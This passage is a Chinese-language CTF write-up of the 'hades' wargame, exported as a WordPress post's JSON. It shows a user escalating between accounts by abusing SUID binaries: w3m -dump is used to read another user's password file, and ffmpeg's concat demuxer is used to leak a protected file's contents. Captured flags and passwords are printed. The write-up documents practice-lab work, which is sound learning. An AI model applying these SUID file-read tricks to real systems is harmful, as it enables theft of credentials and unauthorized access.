\n\/dev\/pts\/4\n\/dev\/pts\/5\n\/etc\/met.txt\n\/pwned\/iris\/.bash_logout\n\/pwned\/iris\/.bashrc\n\/pwned\/iris\/.profile\niris@hades:~$ find \/ -name navig 2&gt;\/dev\/null\niris@hades:~$ find \/ -name *navig* 2&gt;\/dev\/null\n\/usr\/share\/icons\/hicolor\/scalable\/stock\/navigation\n\/usr\/share\/icons\/hicolor\/48x48\/stock\/navigation\n\/usr\/share\/icons\/hicolor\/96x96\/stock\/navigation\n\/usr\/share\/icons\/hicolor\/256x256\/stock\/navigation\n\/usr\/share\/icons\/hicolor\/32x32\/stock\/navigation\n\/usr\/share\/icons\/hicolor\/128x128\/stock\/navigation\n\/usr\/share\/icons\/hicolor\/72x72\/stock\/navigation\n\/usr\/share\/icons\/hicolor\/192x192\/stock\/navigation\n\/usr\/share\/icons\/hicolor\/64x64\/stock\/navigation\n\/usr\/share\/icons\/hicolor\/22x22\/stock\/navigation\n\/usr\/share\/icons\/hicolor\/24x24\/stock\/navigation\n\/usr\/share\/icons\/hicolor\/16x16\/stock\/navigation\n\/usr\/share\/icons\/hicolor\/36x36\/stock\/navigation\n\/usr\/share\/icons\/hicolor\/512x512\/stock\/navigation\niris@hades:~$ find \/ -user kore 2&gt;\/dev\/null | grep -v proc\n\/srv\/kore_pass.txt\n\/dev\/pts\/3\n\/usr\/bin\/w3m\niris@hades:~$ ls -la \/usr\/bin\/w3m\n-rwS--s--- 1 kore iris 1630888 Jan 29  2023 \/usr\/bin\/w3m\niris@hades:~$ whoami;id\niris\nuid=2030(iris) gid=2030(iris) groups=2030(iris)\niris@hades:~$ \/usr\/bin\/w3m\nw3m version w3m\/0.5.3+git20230121, options lang=en,m17n,image,color,ansi-color,mouse,gpm,menu,cookie,ssl,ssl-verify,external-uri-loader,w3mmailer,nntp,gopher,ipv6,alarm,mark,migemo  \nusage: w3m [options] [URL or filename]\noptions:\n    -t tab           set tab width\n    -r               ignore backspace effect\n    -l line          # of preserved line (default 10000)\n    -I charset       document charset\n    -O charset       display\/output charset\n    -B               load bookmark\n    -bookmark file   specify bookmark file\n    -T type          specify content-type\n    -m               internet message mode\n    -v               visual startup mode\n    -M               monochrome display\n    -H               use high-intensity colors\n    -N               open URL of command line on each new tab\n    -F               automatically render frames\n    -cols width      specify column width (used with -dump)\n    -ppc count       specify the number of pixels per character (4.0...32.0)\n    -ppl count       specify the number of pixels per line (4.0...64.0)\n    -dump            dump formatted page into stdout\n    -dump_head       dump response of HEAD request into stdout\n    -dump_source     dump page source into stdout\n    -dump_both       dump HEAD and source into stdout\n    -dump_extra      dump HEAD, source, and extra information into stdout\n    -post file       use POST method with file content\n    -header string   insert string as a header\n    +&lt;num&gt;           goto &lt;num&gt; line\n    -num             show line number\n    -no-proxy        don&#039;t use proxy\n    -4               IPv4 only (-o dns_order=4)\n    -6               IPv6 only (-o dns_order=6)\n    -insecure        use insecure SSL config options\n    -no-mouse        don&#039;t use mouse\n    -cookie          use cookie (-no-cookie: don&#039;t use cookie)\n    -graph           use DEC special graphics for border of table and menu\n    -no-graph        use ASCII character for border of table and menu\n    -s               squeeze multiple blank lines\n    -W               toggle search wrap mode\n    -X               don&#039;t use termcap init\/deinit\n    -title[=TERM]    set buffer name to terminal title string\n    -o opt=value     assign value to config option\n    -show-option     print all config options\n    -config file     specify config file\n    -debug           use debug mode (only for debugging)\n    -reqlog          write request logfile\n    -help            print this usage message\n    -version         print w3m version<\/code><\/pre>\n<p>\u53ef\u4ee5\u53c2\u8003\uff1a <a href=\"https:\/\/gtfobins.github.io\/gtfobins\/w3m\/\">https:\/\/gtfobins.github.io\/gtfobins\/w3m\/<\/a><\/p>\n<pre><code class=\"language-bash\">iris@hades:~$ \/usr\/bin\/w3m \/pwned\/kore\/flagz.txt -dump\nw3m: Can&#039;t load \/pwned\/kore\/flagz.txt.\niris@hades:~$ \/usr\/bin\/w3m \/srv\/kore_pass.txt -dump\nmdAXiSXteTPiGGTpmajP<\/code><\/pre>\n<h2>40 kore<\/h2>\n<pre><code class=\"language-bash\">kore@hades:~$ ls -la\ntotal 32\ndrwxr-x--- 2 root kore 4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root root 4096 Apr  5 06:36 ..\n-rw-r--r-- 1 kore kore  220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 kore kore 3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 kore kore  807 Apr 23  2023 .profile\n-rw-r----- 1 root kore   22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root kore  156 Apr  5 06:36 mission.txt\nkore@hades:~$ cat flagz.txt \n^FEYohPSMjrxKzdLNxkQ^\nkore@hades:~$ cat mission.txt \n################\n# MISSION 0x40 #\n################\n\n## EN ##\nUser leda always wanted to edit videos.\n\n## ES ##\nLa usuaria leda siempre quiso editar videos.\nkore@hades:~$ sudo -l\n[sudo] password for kore: \nSorry, user kore may not run sudo on hades.\nkore@hades:~$ find \/ -user leda 2&gt;\/dev\/null\n\/usr\/bin\/ffmpeg\n\/etc\/led\nkore@hades:~$ ls -la \/usr\/bin\/ffmpeg\n-rwS--s--- 1 leda kore 293288 Nov 11  2023 \/usr\/bin\/ffmpeg\nkore@hades:~$ ls -la \/etc\/led\n-r--r----- 1 leda leda 14 Sep 21  2005 \/etc\/led\nkore@hades:~$ \/usr\/bin\/ffmpeg\nffmpeg version 5.1.4-0+deb12u1 Copyright (c) 2000-2023 the FFmpeg developers\n  built with gcc 12 (Debian 12.2.0-14)\n  configuration: --prefix=\/usr --extra-version=0+deb12u1 --toolchain=hardened --libdir=\/usr\/lib\/x86_64-linux-gnu --incdir=\/usr\/include\/x86_64-linux-gnu --arch=amd64 --enable-gpl --di\nsable-stripping --enable-gnutls --enable-ladspa --enable-libaom --enable-libass --enable-libbluray --enable-libbs2b --enable-libcaca --enable-libcdio --enable-libcodec2 --enable-libd\nav1d --enable-libflite --enable-libfontconfig --enable-libfreetype --enable-libfribidi --enable-libglslang --enable-libgme --enable-libgsm --enable-libjack --enable-libmp3lame --enab\nle-libmysofa --enable-libopenjpeg --enable-libopenmpt --enable-libopus --enable-libpulse --enable-librabbitmq --enable-librist --enable-librubberband --enable-libshine --enable-libsn\nappy --enable-libsoxr --enable-libspeex --enable-libsrt --enable-libssh --enable-libsvtav1 --enable-libtheora --enable-libtwolame --enable-libvidstab --enable-libvorbis --enable-libv\npx --enable-libwebp --enable-libx265 --enable-libxml2 --enable-libxvid --enable-libzimg --enable-libzmq --enable-libzvbi --enable-lv2 --enable-omx --enable-openal --enable-opencl --e\nnable-opengl --enable-sdl2 --disable-sndio --enable-libjxl --enable-pocketsphinx --enable-librsvg --enable-libmfx --enable-libdc1394 --enable-libdrm --enable-libiec61883 --enable-chromaprint --enable-frei0r --enable-libx264 --enable-libplacebo --enable-librav1e --enable-shared\n  libavutil      57. 28.100 \/ 57. 28.100\n  libavcodec     59. 37.100 \/ 59. 37.100\n  libavformat    59. 27.100 \/ 59. 27.100\n  libavdevice    59.  7.100 \/ 59.  7.100\n  libavfilter     8. 44.100 \/  8. 44.100\n  libswscale      6.  7.100 \/  6.  7.100\n  libswresample   4.  7.100 \/  4.  7.100\n  libpostproc    56.  6.100 \/ 56.  6.100\nHyper fast Audio and Video encoder\nusage: ffmpeg [options] [[infile options] -i infile]... {[outfile options] outfile}...\n\nUse -h to get full help or, even better, run &#039;man ffmpeg&#039;\nkore@hades:~$ ffmpeg -h\nffmpeg version 5.1.4-0+deb12u1 Copyright (c) 2000-2023 the FFmpeg developers\n  built with gcc 12 (Debian 12.2.0-14)\n  configuration: --prefix=\/usr --extra-version=0+deb12u1 --toolchain=hardened --libdir=\/usr\/lib\/x86_64-linux-gnu --incdir=\/usr\/include\/x86_64-linux-gnu --arch=amd64 --enable-gpl --disable-stripping --enable-gnutls --enable-ladspa --enable-libaom --enable-libass --enable-libbluray --enable-libbs2b --enable-libcaca --enable-libcdio --enable-libcodec2 --enable-libdav1d --enable-libflite --enable-libfontconfig --enable-libfreetype --enable-libfribidi --enable-libglslang --enable-libgme --enable-libgsm --enable-libjack --enable-libmp3lame --enable-libmysofa --enable-libopenjpeg --enable-libopenmpt --enable-libopus --enable-libpulse --enable-librabbitmq --enable-librist --enable-librubberband --enable-libshine --enable-libsnappy --enable-libsoxr --enable-libspeex --enable-libsrt --enable-libssh --enable-libsvtav1 --enable-libtheora --enable-libtwolame --enable-libvidstab --enable-libvorbis --enable-libvpx --enable-libwebp --enable-libx265 --enable-libxml2 --enable-libxvid --enable-libzimg --enable-libzmq --enable-libzvbi --enable-lv2 --enable-omx --enable-openal --enable-opencl --enable-opengl --enable-sdl2 --disable-sndio --enable-libjxl --enable-pocketsphinx --enable-librsvg --enable-libmfx --enable-libdc1394 --enable-libdrm --enable-libiec61883 --enable-chromaprint --enable-frei0r --enable-libx264 --enable-libplacebo --enable-librav1e --enable-shared\n  libavutil      57. 28.100 \/ 57. 28.100\n  libavcodec     59. 37.100 \/ 59. 37.100\n  libavformat    59. 27.100 \/ 59. 27.100\n  libavdevice    59.  7.100 \/ 59.  7.100\n  libavfilter     8. 44.100 \/  8. 44.100\n  libswscale      6.  7.100 \/  6.  7.100\n  libswresample   4.  7.100 \/  4.  7.100\n  libpostproc    56.  6.100 \/ 56.  6.100\nHyper fast Audio and Video encoder\nusage: ffmpeg [options] [[infile options] -i infile]... {[outfile options] outfile}...\n\nGetting help:\n    -h      -- print basic options\n    -h long -- print more options\n    -h full -- print all options (including all format and codec specific options, very long)\n    -h type=name -- print all options for the named decoder\/encoder\/demuxer\/muxer\/filter\/bsf\/protocol\n    See man ffmpeg for detailed description of the options.\n\nPrint help \/ information \/ capabilities:\n-L                  show license\n-h topic            show help\n-? topic            show help\n-help topic         show help\n--help topic        show help\n-version            show version\n-buildconf          show build configuration\n-formats            show available formats\n-muxers             show available muxers\n-demuxers           show available demuxers\n-devices            show available devices\n-codecs             show available codecs\n-decoders           show available decoders\n-encoders           show available encoders\n-bsfs               show available bit stream filters\n-protocols          show available protocols\n-filters            show available filters\n-pix_fmts           show available pixel formats\n-layouts            show standard channel layouts\n-sample_fmts        show available audio sample formats\n-dispositions       show available stream dispositions\n-colors             show available color names\n-sources device     list sources of the input device\n-sinks device       list sinks of the output device\n-hwaccels           show available HW acceleration methods\n\nGlobal options (affect whole program instead of just one file):\n-loglevel loglevel  set logging level\n-v loglevel         set logging level\n-report             generate a report\n-max_alloc bytes    set maximum size of a single allocated block\n-y                  overwrite output files\n-n                  never overwrite output files\n-ignore_unknown     Ignore unknown stream types\n-filter_threads     number of non-complex filter threads\n-filter_complex_threads  number of threads for -filter_complex\n-stats              print progress report during encoding\n-max_error_rate maximum error rate  ratio of decoding errors (0.0: no errors, 1.0: 100% errors) above which ffmpeg returns an error instead of success.\n-vol volume         change audio volume (256=normal)\n\nPer-file main options:\n-f fmt              force format\n-c codec            codec name\n-codec codec        codec name\n-pre preset         preset name\n-map_metadata outfile[,metadata]:infile[,metadata]  set metadata information of outfile from infile\n-t duration         record or transcode &quot;duration&quot; seconds of audio\/video\n-to time_stop       record or transcode stop time\n-fs limit_size      set the limit file size in bytes\n-ss time_off        set the start time offset\n-sseof time_off     set the start time offset relative to EOF\n-seek_timestamp     enable\/disable seeking by timestamp with -ss\n-timestamp time     set the recording timestamp (&#039;now&#039; to set the current time)\n-metadata string=string  add metadata\n-program title=string:st=number...  add program with specified streams\n-target type        specify target file type (&quot;vcd&quot;, &quot;svcd&quot;, &quot;dvd&quot;, &quot;dv&quot; or &quot;dv50&quot; with optional prefixes &quot;pal-&quot;, &quot;ntsc-&quot; or &quot;film-&quot;)\n-apad               audio pad\n-frames number      set the number of frames to output\n-filter filter_graph  set stream filtergraph\n-filter_script filename  read stream filtergraph description from a file\n-reinit_filter      reinit filtergraph on input parameter changes\n-discard            discard\n-disposition        disposition\n\nVideo options:\n-vframes number     set the number of video frames to output\n-r rate             set frame rate (Hz value, fraction or abbreviation)\n-fpsmax rate        set max frame rate (Hz value, fraction or abbreviation)\n-s size             set frame size (WxH or abbreviation)\n-aspect aspect      set aspect ratio (4:3, 16:9 or 1.3333, 1.7777)\n-vn                 disable video\n-vcodec codec       force video codec (&#039;copy&#039; to copy stream)\n-timecode hh:mm:ss[:;.]ff  set initial TimeCode value.\n-pass n             select the pass number (1 to 3)\n-vf filter_graph    set video filters\n-ab bitrate         audio bitrate (please use -b:a)\n-b bitrate          video bitrate (please use -b:v)\n-dn                 disable data\n\nAudio options:\n-aframes number     set the number of audio frames to output\n-aq quality         set audio quality (codec-specific)\n-ar rate            set audio sampling rate (in Hz)\n-ac channels        set number of audio channels\n-an                 disable audio\n-acodec codec       force audio codec (&#039;copy&#039; to copy stream)\n-vol volume         change audio volume (256=normal)\n-af filter_graph    set audio filters\n\nSubtitle options:\n-s size             set frame size (WxH or abbreviation)\n-sn                 disable subtitle\n-scodec codec       force subtitle codec (&#039;copy&#039; to copy stream)\n-stag fourcc\/tag    force subtitle tag\/fourcc\n-fix_sub_duration   fix subtitles duration\n-canvas_size size   set canvas size (WxH or abbreviation)\n-spre preset        set the subtitle options to the indicated preset<\/code><\/pre>\n<p>\u5728 hacktrick \u627e\u5230\u8fd9\u4e2a payload\uff1a<\/p>\n<blockquote>\n<p>ffmpeg is crucial for assessing the integrity of audio files, highlighting detailed information and pinpointing any discrepancies.<br \/>\nffmpeg -v info -i stego.mp3 -f null -<\/p>\n<\/blockquote>\n<p>\u7136\u540e\u95ee\u4e86\u4e00\u4e0brpj7\uff0c\u4ed6\u544a\u8bc9\u6211\u662f\u7531 concat \u4ee5\u53ca -i \u5b9e\u73b0\u7684\uff0c\u6211\u770b\u4e86\u4e00\u4e9b\u6587\u7ae0\u8fdb\u884c\u4e86\u90e8\u5206\u4fee\u6539\uff08\u4ee5\u53ca\u90e8\u5206discord\u5267\u900f\u7684\u7ec6\u8282\uff09<\/p>\n<ul>\n<li><a href=\"https:\/\/stackoverflow.com\/questions\/38996925\/ffmpeg-concat-unsafe-file-name\">https:\/\/stackoverflow.com\/questions\/38996925\/ffmpeg-concat-unsafe-file-name<\/a><\/li>\n<li><a href=\"https:\/\/community.unix.com\/t\/ffmpeg-invalid-data-found-when-processing-input\/381336\/15\">https:\/\/community.unix.com\/t\/ffmpeg-invalid-data-found-when-processing-input\/381336\/15<\/a><\/li>\n<li><a href=\"https:\/\/stackoverflow.com\/questions\/50455695\/why-does-ffmpeg-ignore-protocol-whitelist-flag-when-converting-https-m3u8-stream\">https:\/\/stackoverflow.com\/questions\/50455695\/why-does-ffmpeg-ignore-protocol-whitelist-flag-when-converting-https-m3u8-stream<\/a><\/li>\n<\/ul>\n<p>\u597d\u5427\u60f3\u4e0d\u51fa\u6765\u4e86\uff0c\u5c1d\u8bd5\u6309\u7167 <code>rpj7<\/code>\u5e08\u5085\u7684\u65b9\u6cd5\u8fdb\u884c\u5c1d\u8bd5\u5427\uff1a<\/p>\n<ul>\n<li>\u9996\u5148\u8981\u8bbe\u7f6e safe \u7b49\u7ea7\u4e3a 0<\/li>\n<li>\u7136\u540e\u8bbe\u7f6e\u767d\u540d\u5355<\/li>\n<\/ul>\n<pre><code class=\"language-bash\">kore@hades:~$ \/usr\/bin\/ffmpeg -f concat -safe 0 -protocol_whitelist file,https,tcp,tls,crypto -i \/etc\/led\nffmpeg version 5.1.4-0+deb12u1 Copyright (c) 2000-2023 the FFmpeg developers\n  built with gcc 12 (Debian 12.2.0-14)\n  configuration: --prefix=\/usr --extra-version=0+deb12u1 --toolchain=hardened --libdir=\/usr\/lib\/x86_64-linux-gnu --incdir=\/usr\/include\/x86_64-linux-gnu --arch=amd64 --enable-gpl --disable-stripping --enable-gnutls --enable-ladspa --enable-libaom --enable-libass --enable-libbluray --enable-libbs2b --enable-libcaca --enable-libcdio --enable-libcodec2 --enable-libdav1d --enable-libflite --enable-libfontconfig --enable-libfreetype --enable-libfribidi --enable-libglslang --enable-libgme --enable-libgsm --enable-libjack --enable-libmp3lame --enable-libmysofa --enable-libopenjpeg --enable-libopenmpt --enable-libopus --enable-libpulse --enable-librabbitmq --enable-librist --enable-librubberband --enable-libshine --enable-libsnappy --enable-libsoxr --enable-libspeex --enable-libsrt --enable-libssh --enable-libsvtav1 --enable-libtheora --enable-libtwolame --enable-libvidstab --enable-libvorbis --enable-libvpx --enable-libwebp --enable-libx265 --enable-libxml2 --enable-libxvid --enable-libzimg --enable-libzmq --enable-libzvbi --enable-lv2 --enable-omx --enable-openal --enable-opencl --enable-opengl --enable-sdl2 --disable-sndio --enable-libjxl --enable-pocketsphinx --enable-librsvg --enable-libmfx --enable-libdc1394 --enable-libdrm --enable-libiec61883 --enable-chromaprint --enable-frei0r --enable-libx264 --enable-libplacebo --enable-librav1e --enable-shared\n  libavutil      57. 28.100 \/ 57. 28.100\n  libavcodec     59. 37.100 \/ 59. 37.100\n  libavformat    59. 27.100 \/ 59. 27.100\n  libavdevice    59.  7.100 \/ 59.  7.100\n  libavfilter     8. 44.100 \/  8. 44.100\n  libswscale      6.  7.100 \/  6.  7.100\n  libswresample   4.  7.100 \/  4.  7.100\n  libpostproc    56.  6.100 \/ 56.  6.100\n[concat @ 0x55b472e97e40] Line 1: unknown keyword &#039;NODEVILINHELL&#039;\n\/etc\/led: Invalid data found when processing input   \n\nkore@hades:~$ \/usr\/bin\/ffmpeg -f concat  -i \/etc\/led  \nffmpeg version 5.1.4-0+deb12u1 Copyright (c) 2000-2023 the FFmpeg developers\n  built with gcc 12 (Debian 12.2.0-14)\n  configuration: --prefix=\/usr --extra-version=0+deb12u1 --toolchain=hardened --libdir=\/usr\/lib\/x86_64-linux-gnu --incdir=\/usr\/include\/x86_64-linux-gnu --arch=amd64 --enable-gpl --di\nsable-stripping --enable-gnutls --enable-ladspa --enable-libaom --enable-libass --enable-libbluray --enable-libbs2b --enable-libcaca --enable-libcdio --enable-libcodec2 --enable-libd\nav1d --enable-libflite --enable-libfontconfig --enable-libfreetype --enable-libfribidi --enable-libglslang --enable-libgme --enable-libgsm --enable-libjack --enable-libmp3lame --enab\nle-libmysofa --enable-libopenjpeg --enable-libopenmpt --enable-libopus --enable-libpulse --enable-librabbitmq --enable-librist --enable-librubberband --enable-libshine --enable-libsn\nappy --enable-libsoxr --enable-libspeex --enable-libsrt --enable-libssh --enable-libsvtav1 --enable-libtheora --enable-libtwolame --enable-libvidstab --enable-libvorbis --enable-libv\npx --enable-libwebp --enable-libx265 --enable-libxml2 --enable-libxvid --enable-libzimg --enable-libzmq --enable-libzvbi --enable-lv2 --enable-omx --enable-openal --enable-opencl --e\nnable-opengl --enable-sdl2 --disable-sndio --enable-libjxl --enable-pocketsphinx --enable-librsvg --enable-libmfx --enable-libdc1394 --enable-libdrm --enable-libiec61883 --enable-chromaprint --enable-frei0r --enable-libx264 --enable-libplacebo --enable-librav1e --enable-shared\n  libavutil      57. 28.100 \/ 57. 28.100\n  libavcodec     59. 37.100 \/ 59. 37.100\n  libavformat    59. 27.100 \/ 59. 27.100\n  libavdevice    59.  7.100 \/ 59.  7.100\n  libavfilter     8. 44.100 \/  8. 44.100\n  libswscale      6.  7.100 \/  6.  7.100\n  libswresample   4.  7.100 \/  4.  7.100\n  libpostproc    56.  6.100 \/ 56.  6.100\n[concat @ 0x561126180d80] Line 1: unknown keyword &#039;NODEVILINHELL&#039;\n\/etc\/led: Invalid data found when processing input <\/code><\/pre>\n<p>\u4e0a\u4e0b\u4fe9\u547d\u4ee4\u4e00\u6837\u7684\uff1a<\/p>\n<pre><code class=\"language-bash\">kore@hades:~$ \/usr\/bin\/ffmpeg -f concat -safe 0 -i \/etc\/led\nffmpeg version 5.1.4-0+deb12u1 Copyright (c) 2000-2023 the FFmpeg developers\n  built with gcc 12 (Debian 12.2.0-14)\n  configuration: --prefix=\/usr --extra-version=0+deb12u1 --toolchain=hardened --libdir=\/usr\/lib\/x86_64-linux-gnu --incdir=\/usr\/include\/x86_64-linux-gnu --arch=amd64 --enable-gpl --di\nsable-stripping --enable-gnutls --enable-ladspa --enable-libaom --enable-libass --enable-libbluray --enable-libbs2b --enable-libcaca --enable-libcdio --enable-libcodec2 --enable-libd\nav1d --enable-libflite --enable-libfontconfig --enable-libfreetype --enable-libfribidi --enable-libglslang --enable-libgme --enable-libgsm --enable-libjack --enable-libmp3lame --enab\nle-libmysofa --enable-libopenjpeg --enable-libopenmpt --enable-libopus --enable-libpulse --enable-librabbitmq --enable-librist --enable-librubberband --enable-libshine --enable-libsn\nappy --enable-libsoxr --enable-libspeex --enable-libsrt --enable-libssh --enable-libsvtav1 --enable-libtheora --enable-libtwolame --enable-libvidstab --enable-libvorbis --enable-libv\npx --enable-libwebp --enable-libx265 --enable-libxml2 --enable-libxvid --enable-libzimg --enable-libzmq --enable-libzvbi --enable-lv2 --enable-omx --enable-openal --enable-opencl --e\nnable-opengl --enable-sdl2 --disable-sndio --enable-libjxl --enable-pocketsphinx --enable-librsvg --enable-libmfx --enable-libdc1394 --enable-libdrm --enable-libiec61883 --enable-chromaprint --enable-frei0r --enable-libx264 --enable-libplacebo --enable-librav1e --enable-shared\n  libavutil      57. 28.100 \/ 57. 28.100\n  libavcodec     59. 37.100 \/ 59. 37.100\n  libavformat    59. 27.100 \/ 59. 27.100\n  libavdevice    59.  7.100 \/ 59.  7.100\n  libavfilter     8. 44.100 \/  8. 44.100\n  libswscale      6.  7.100 \/  6.  7.100\n  libswresample   4.  7.100 \/  4.  7.100\n  libpostproc    56.  6.100 \/ 56.  6.100\n[concat @ 0x560db5ffce00] Line 1: unknown keyword &#039;NODEVILINHELL&#039;\n\/etc\/led: Invalid data found when processing input<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>31 halcyon halcyon@hades:~$ ls -la total 32 drwxr-x&#8212;  [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-727","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/727","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=727"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/727\/revisions"}],"predecessor-version":[{"id":728,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/727\/revisions\/728"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=727"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=727"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=727"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}